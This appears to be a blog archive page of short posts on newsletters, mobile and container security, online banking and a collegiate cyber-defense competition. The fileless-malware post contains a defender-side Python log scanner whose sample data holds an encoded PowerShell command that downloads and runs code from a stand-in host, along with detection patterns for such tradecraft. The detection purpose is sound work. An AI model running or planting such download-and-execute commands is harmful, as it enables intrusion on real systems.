FIR B2B podcast #119: Our favorite email newsletter tips

Paul Gillin and I are old hands at email newsletters. Paul had his own for several years and has produced several for his clients. I currently publish two: my own Web Informant, which I have been doing almost weekly since 2003, and Inside Security which is part of a group of newsletters. We share a few tips from our years of experience.

The first is to know your audience and segment them for best results. This post in Marketing Week documents how marketers are segmenting the audiences at a much finer level than they previously did thanks to an explosion in behavioral data from third parties. One bottled water vendor was able to dramatically boost the response rate of its YouTube ads with an email newsletter sliced by 16 different segments. The survey found that behavior and location are the most effective segmentation methods, with the old stalwarts like age and gender being the least effective.

We discuss how to craft your subject line and choose a coherent theme, as well as how to pick the optimal length and number of hyperlinks to include. If you do use links, beware of URL shortening services, since many spam filters block them. There’s also the question of whether to make your newsletters text-only or to go the HTML route. If you choose the latter, be sure to test each newsletter with different browsers and different screen depths. Finally, we cover how to choose the right tool for the mailings. We’ve used a variety of them over the years, and each has different strengths and weaknesses. Some of these topics are mentioned in this piece for Marketing360.

We’d love to hear from you about your favorite email newsletters and tips for creating your own. You can listen to our 16 min. podcast here:

Security Intelligence: How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing. Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

Given this growing threat, I provide several tips on what security teams can do to help defend their organizations against these attacks in my latest post for IBM’s Security Intelligence blog.
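As an added, defender-side example (not code from the IBM post or from this page), here is a small Python pass over constructed Windows event log lines that flags the three “living off the land” artefacts named above: a PowerShell process launched with an encoded command (which it decodes and inspects), a WMI permanent event subscription, and a registry Run value that launches a script host. The log line format, the event IDs used as labels and the sample payload are assumptions made for illustration.

```python
"""Flag 'living off the land' indicators in constructed Windows event log lines.

Example code, not from the original post. Line shape assumed here:
  '<timestamp> EventID=<n> <command line or event text>'
"""
import base64
import re
from typing import Dict, List

# Constructed for this example: a download-and-run one-liner encoded the way
# powershell.exe -EncodedCommand expects it (base64 over UTF-16LE).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample lines. 4688 = process creation, 5861 = WMI-Activity
# permanent consumer registration, 4657 = registry value change.
SAMPLE_LOGS = [
    "2019-04-01T08:00:01 EventID=4688 powershell.exe -NoProfile -Command Get-Process",
    f"2019-04-01T08:00:07 EventID=4688 powershell.exe -nop -w hidden -enc {ENCODED}",
    "2019-04-01T08:00:12 EventID=4688 wmic.exe os get caption",
    "2019-04-01T08:00:20 EventID=5861 Namespace=root/subscription; "
    "Consumer=CommandLineEventConsumer; Filter=__EventFilter",
    "2019-04-01T08:00:33 EventID=4657 Value set: HKCU\\Software\\Microsoft\\Windows"
    "\\CurrentVersion\\Run\\Updater = mshta C:\\ProgramData\\update.hta",
    "2019-04-01T08:00:41 EventID=4688 notepad.exe C:\\Users\\alice\\notes.txt",
]

# -e/-ec/-enc/-EncodedCommand followed by a base64 blob (PowerShell accepts prefixes).
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Cmdlets and switches that are rare in admin scripts but common in fileless tradecraft.
SUSPICIOUS_PS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|frombase64string|-w(?:indowstyle)?\s+hidden", re.I)
WMI_PERSIST = re.compile(r"__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer", re.I)
RUN_KEY_SCRIPT_HOST = re.compile(
    r"\\CurrentVersion\\Run[^=]*=\s*(?:powershell|pwsh|mshta|wscript|cscript|regsvr32|rundll32)", re.I)


def decode_powershell_arg(blob: str):
    """Decode an -EncodedCommand argument; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> List[str]:
    """Return the indicators found in one log line (empty list if it looks benign)."""
    findings = []
    enc = ENC_FLAG.search(line)
    if enc:
        findings.append("encoded PowerShell command line")
        decoded = decode_powershell_arg(enc.group(1))
        if decoded and SUSPICIOUS_PS.search(decoded):
            findings.append("decoded payload contains download/eval cmdlets")
    if SUSPICIOUS_PS.search(line):
        findings.append("suspicious PowerShell switches in clear text")
    if WMI_PERSIST.search(line):
        findings.append("WMI permanent event subscription")
    if RUN_KEY_SCRIPT_HOST.search(line):
        findings.append("Run key points at a script host")
    return findings


def scan(lines) -> Dict[str, List[str]]:
    """Map each flagged line to its indicators; benign lines are dropped."""
    report = {}
    for line in lines:
        hits = analyze_line(line)
        if hits:
            report[line] = hits
    return report


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS).items():
        print(line[:60] + "...", "->", "; ".join(hits))
```

Three of the six constructed lines are flagged; the decoded PowerShell argument is what lets the check see through the encoding rather than alerting on every encoded command.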

How to protect your mobile apps using Zimperium’s zIAP SDK (screencast)

If you are looking for a way to protect your Android and iOS apps from malware and other mobile threats, you should look at Zimperium’s In-App Protection (zIAP) SDK. It supports both Apple Xcode for iOS apps and Android Studio for Android apps. One of the advantages of zIAP is that you don’t have to redeploy your code, because changes are updated dynamically at runtime and automatically pushed to your devices. zIAP ensures that mobile applications remain safe from cyber attacks by providing immediate device risk assessments and threat alerts. Organizations can minimize exposure of their sensitive data, and prevent their customers’ and partners’ data from being jeopardized by malicious and fraudulent activity. I tested the product in April 2019.

Pricing starts for 10K Monthly Active Devices at $12,000 per year, with steep quantity discounts available.

https://go.zimperium.com/david-strom-ziap

Keywords: strom, screencast review, webinformant, zimperium, mobile security, app security, Android security, iOS security

RSA blog: Third-party risk is the soft underbelly of cybersecurity

In the past several weeks, we have seen the effects of ignoring the risks of our third-party vendors. They can quickly put your enterprise in peril, as this story about a third-party provider to the airline industry illustrates. In this case, a back-end database supplier grounded scheduled flights because of a computer outage. And then there is this story about how two third-party providers working with Facebook exposed more than 500M records in unsecured online databases. These are just the more notable ones. Hackers are getting cleverer about how and when they attack us, and often our third-party apps and vendors are the soft underbelly of our cybersecurity. Witness the various attacks on point-of-sale vendors or back-end database vendors, payment providers or ecommerce plug-ins, etc. And then there are system failures, such as what happened to the airline databases.

You can read my column on RSA’s blog here about what to do about managing third-party threats.

CSOonline: How to improve container security

Gartner has named container security one of its top ten concerns for this year, so it might be time to take a closer look at this issue and figure out a solid security implementation plan. While containers have been around for a decade, they are becoming increasingly popular because of their lightweight and reusable code, flexible features and lower development cost. In this post for CSOonline, I’ll look at the kinds of tools needed to secure the devops/build environment, tools for the containers themselves, and tools for monitoring/auditing/compliance purposes. Naturally, no single tool will do everything.

FIR B2B podcast #118: Customers as advocates, ODI progress and why you need a style guide

We have a trio of discussion items on this week’s podcast with myself and Paul Gillin. The first is from DigitalCommerce360 and concerns how customers should be your best advocates at building your brand identity and promoting your company. Marketers who focus on improving the customer experience and figuring out ways to regularly listen to customers’ desires and complaints can benefit from low-cost and powerful word-of-mouth promotion. So why don’t more B2B marketers have programs aimed at loyal customers?

Late last month there was some progress to report on the Open Data Initiative, a standards effort launched last fall that seeks to create a standard for the interchange of marketing data. Sounds boring, but with marketers spending more on analytics than IT organizations these days, we think it’s important. Executives from Adobe, Microsoft and SAP just gave more details about how the three will standardize interfaces among their products to help common customers get a clearer view of their customers without going through a lot of messy data transformation. The trio also announced a slew of VAR partners that will support ODI. But the list was also notable for the big companies that weren’t there, like Oracle, Salesforce.com and marketing automation vendors.

Our final item is How to Create a Style Guide for Content Marketing. Too often marketers jump into content programs without laying the groundwork for a consistent style and direction for their blogs and websites. Having a solid style guide isn’t just about where to place your commas but about the right tone of voice and point of view that your authors should take. There is a lot of good advice in this piece.

You can listen to our 14 min. podcast here:

How business voice-enabled apps will become the next thing

If you have an Alexa or Google Home nearby, you probably already know how handy it can be to help your life. But what you may not be as aware is how businesses are adopting voice-enabled information access, and how this technology could become as revolutionary as HTML and websites were back in the 1990s.

I got to see some of this future at the Prepare.AI conference yesterday here in St. Louis. In particular, a presentation by Bob Stolzberg, the founder of VoiceXP, a two-year old startup that is beginning to make some noise with a voice toolkit that is aimed at business. At the show, Bob demonstrated a couple of examples, using an Alexa as his speaking partner.

One was an app developed for Mercy Health, so you can locate the nearest doctor with just a few commands (Say “Alexa, Start Mercy”). Another was for a law firm, so you can use voice commands to find a lawyer after you have been in an auto accident. One app showed how an executive could easily get various business metrics reported via voice, rather than plowing through a bunch of spreadsheets. One for a scientific research company allows their researchers to add experimental notes via voice commands, so they don’t have to remove their gloves and type them in. “Businesses are adopting voice apps to start their conference calls, to integrate with Slack as replacements for front-desk check-in kiosks, and numerous other apps. We are living in a voice-enabled world,” he said at the conference. They have a few demos on their site with apps that they have built for other companies as well.

The Mercy app was a significant effort, taking a good-sized team working over several months and a pretty substantial budget to put it together. That experience got them working on a much easier path for developing business voice apps, so that ordinary folks could build them without a lot of programming or systems integration knowledge. They call it their Voice Experience Platform. It is still in beta but nearing launch, with several different plans that include managed services hosting, custom lead gen features and help with on-boarding the apps. They also provide a voice marketing plan that teaches businesses how to successfully market their new voice experience.

Voice-enabled apps do have their downside, namely a threat to our privacy and potential misuse by bad actors. Given that the Alexa/Home device is always listening, this data could be captured or subject to a man-in-the-middle attack without the proper security posture. VoiceXP has security built into its platform, which is encouraging. “What if a rogue device shared confidential medical data,” asks Adam Levine, a privacy expert. “These new technical advances may make our lives easier, but we need to see a greater focus on privacy.”

Another issue is that to voice-enable your corporate apps, you need some way to access them programmatically. That could be trouble: with one of their customers, VoiceXP ended up using a complex spreadsheet and pulling data directly from that into their platform.

Finally, voice apps touch many different parts of your organization, similar to how web apps did when they were first created back in the day. You will need to keep an open mind, build your team accordingly, and empower them to collaborate to formulate best practices to make them work successfully.

If you have examples of your favorite business-related skill or action (as these apps are called), do share them in the comments.

My experiences with online banking

This week saw the announcement of Apple Card, a credit card that doesn’t even have a number on its face. While it remains to be seen if Apple will be successful here, certainly we are witnessing a new era of online financial services. More to the point is the development of open banking in the UK. The idea behind open banking was standardizing on APIs to make it easier to move from one bank to another. We are far from that here in the States, but there are many innovators in the banking field. As a big proponent of online banking, here is my report on what I have been using and how they work, for Simple, Aspiration, USAA and Marcus.

Simple was one of the first online banks and I have had an account for several years. They offer no-fee checking/savings and VISA debit cards, although there are some fees for foreign transactions and some ATMs. Opening an account takes minutes and their web interface is clean and easy to understand with superior online help and telephone support.

Marcus is the online entity of Goldman Sachs (who is one of the partners for the Apple Card) and they have two main products: high-interest CDs (right now they offer a five year 3.1% rate) and no-fee loans (6% APR). Opening an account takes minutes and their web interface is clean and simple to understand. I had some issues setting up joint accounts and their telephone support was efficient and helpful and resolved it quickly.

Aspiration offers no-fee checking and debit cards. Actually, that isn’t quite accurate: you decide on the fees that you wish to pay them. It is an interesting gimmick. You can select nothing, and you can change the amount as often as you wish. There are some third-party fees, such as for wire transfers, that they pass along at their cost. They also make it easier for you to donate money to particular causes that you can setup online.

Activating my debit card from them required a call to their telephone support center. This could have been a network problem that they were experiencing at the time. They have a mobile app where they have spent more development time, and their web interface is pretty spare.

USAA has been in the online financial services world for a very long time, and it shows. If you have a family member that has served in the military you can open an account. They offer life, car and home insurance, CDs, credit cards, mutual funds and many more products. They try to keep their costs low and usually send me a small check at the end of the year as a “dividend” to thank me for being a member. I have had my car insurance with them for a long time and they have superior claims service and amazing response time from their telephone call center.  

If you are looking for online banking services, here are some things to look out for:

What services do you need? If you just want a no- or low-fee credit card, there are many solutions, including products from regular card issuers. If you need more online services, you will have fewer choices. USAA offers the widest spectrum and as I said has been doing it for the longest time. 

Opening and funding your account. You want a provider that has taken the time to build a simple and easy-to-use interface. Each provider does this slightly differently. All offer the ability to enter your bank routing and account numbers and make two small test deposits that you have to verify, or you can provide your funding bank’s username and password. Aspiration had two issues: they made the external funding menus hard to find, and they took a week to fund my account. The others were speedier with their funds transfer. Marcus wins this category.

Making deposits, money transfers and obtaining reports. This is the meat of any provider and most have obvious ways of doing this. My local online bank had two separate procedures for funding and then linking an external account, which was annoying and took two calls to their phone support center to resolve. None of the four were any better or worse than others.

What are the hidden fees? Simple is my favorite here, they were one of the first to be very explicit about the fees they charge. Plus, you can find out everything without having to become a customer. The others are less transparent, although they all offer lower fees than your traditional retail bank (as they should).

What are the MFA implementation(s)? Both Simple and Aspiration offer SMS PINs to authenticate, and once you set this up, you can’t change anything without calling them. But the real standout is USAA, which in addition has other options as explained here, including support for Symantec’s VIP smartphone app. All of these are easily changed online, as long as you can find the linked URL above.

If you check this list of MFA options for the banking sector, you will see support for the MFA authentication smartphone apps is pretty sparse. Sigh.

International travel. Simple and Aspiration both let you quickly notify them online of when and where you will be traveling, which is appealing to me and one of the reasons I went down this rabbit hole. For many years, I only had one credit card, whose balance I would pay off each month. When I began doing more international travel, I realized that I wanted to minimize my exposure if my high-credit-limit card was lost or stolen. I opened an account with Simple, one of the first online banks.

Do they offer a mobile app? Simple and Aspiration both offer them and focus on mobile as their primary method for customer transactions.

As you can see, no single provider is strong in all areas, which is a shame because you would hope their development teams could learn from the best examples and enhance their sites.  

Some final words of wisdom: prepare to spend some time with your own research and step into these waters gingerly before committing a lot of your money with any provider. Find out what your local bank offers with their online services, as many of them realize they have to be competitive in this area. And feel free to make recommendations of your own experience in the comments.  

Behind the scenes at a regional NCCD competition

Every year hundreds of college students compete in the National Collegiate Cyber Defense Competition. Teams from around the country begin with regional competitions, and the winners of those go on to compete for bragging rights and cash prizes at the national event in Orlando held at the end of April. A friend of mine from the Seattle area, Stephen Kangas, was one of the volunteers, all of whom are drawn from IT security professionals. I spoke to him this week about some of his experiences. The event simulates defending a corporate network, and is divided into two basic teams: the defenders, who comprise the blue teams from the colleges, and the attackers, or red team. In addition, there are other groups, such as the judges and the “orange team,” which I will get to in a moment. A team of judges with body cams to record the state of play is assigned to each blue team, and these recordings are used to tally up the final point totals. Points are also awarded based on the number of services that are still online and haven’t been hacked, as well as those systems which were hacked and then recovered. Both teams have to file incident reports and these are also evaluated as part of the scores.

Stephen has participated at the competition for several years as a mentor and coach for a team from a local high school that competes in the high school division. This year he was on one of the red teams attacking one of the college blue teams. He has his Certified Ethical Hacker credential and is working towards an MS in Cybersecurity degree too. He has been involved in various IT roles both as a vendor and as a consultant, including a focus in information security, for decades. “I wanted to expand my knowledge in this area. Because most of my experience has been on the defensive side, I wanted to get better, and for that you have to know about the strategy, tools, and tactics used by the offensive black hats out there.”

The event takes place over a weekend and the red team attackers take points away from the defenders for penetrating their corresponding blue team’s network and “pwning” their endpoints, servers, and other devices. “I was surprised at how easy it was to penetrate our target’s network initially. People have no idea how vulnerable they are as individuals and it is becoming easier every day. We need to be preparing and helping people to develop the knowledge and skills to protect us.” His red team consisted of three others that had complementary specializations, such as email, web and SQL server penetration and different OSs. Each of the 30 red team volunteers brings their own laptop, but they all use the same set of hacking tools (which includes Kali Linux, Cobalt Strike, and Empire, among others), and the teams communicate via various Slack channels during the event.

The event has an overall red team manager who is taking notes and sharing tips with the different red teams. Each blue team runs an exact VM copy of the scenario, with the same vulnerabilities and misconfigurations. This year it was a fake prison network. “We all start from the same place. We don’t know the network topology, which mimics the real-world situation where networks are poorly documented (if at all).” Just like in the real world, blue teams were given occasional injects, such as deleting a terminated employee or updating the release date of a prisoner; the red teams were likewise given occasional injects, such as finding and pwning the SQL server and changing the release date to current day.

In addition to the red and blue teams is a group they call the orange team that adds a bit of realism to the competition. These aren’t technical folks but more akin to drama students or improv actors that call into the help desk with problems (I can’t get my email!) and read from scripted suggestions to also put more stress on the blue team to do a better job of defending their network. Points are awarded or taken away from blue teams by the judges depending upon how they handle their Help Desk phone calls.

Adding further realism, during the event members of each red team call the help desk, pretending to be an employee, trying to social engineer them for information. “My team broke in and pwned their domain controllers. We held them for ransom after locking them out of their Domain Controller, which we returned in exchange for keys and IP addresses to some other systems. Another team called and, as ransom, asked the help desk guy to sing a pop song. They had to sing well enough to get back their passwords.” His team also discovered several Linux file shares that had employee and payroll PII on them.

His college’s team came in second, so they are not going on to the nationals (University of Washington won first place). But still, all of the college students learned a lot about better defense that they can use when competing next year, and ultimately when they are employed after graduation. Likewise, the professionals on the red teams learned new tools and techniques from each other that will benefit them in their work. It was an interesting experience and Stephen intends to volunteer for the Pacific Rim region CCDC again next year.

RSA blog: Understanding the trust landscape

Earlier this month, president of RSA, Rohit Ghai, opened the RSA Conference in San Francisco with some stirring words about understanding the trust landscape. The talk is both encouraging and depressing, for what it offers and for how far we have yet to go to realize this vision completely.

Back in the day, we had the now-naïve notion that defending a perimeter was sufficient. If you were “inside” (however defined), you were automatically trusted. Or once you authenticated yourself, you were then trusted. It was a binary decision: in or out. Today, there is nothing completely inside and trusted anymore.

I go into more detail in my blog post, Understanding the trust landscape, here. I had an opportunity to spend some time with Rohit at a presentation we both did in London earlier this year and enjoyed exchanging many ideas with him.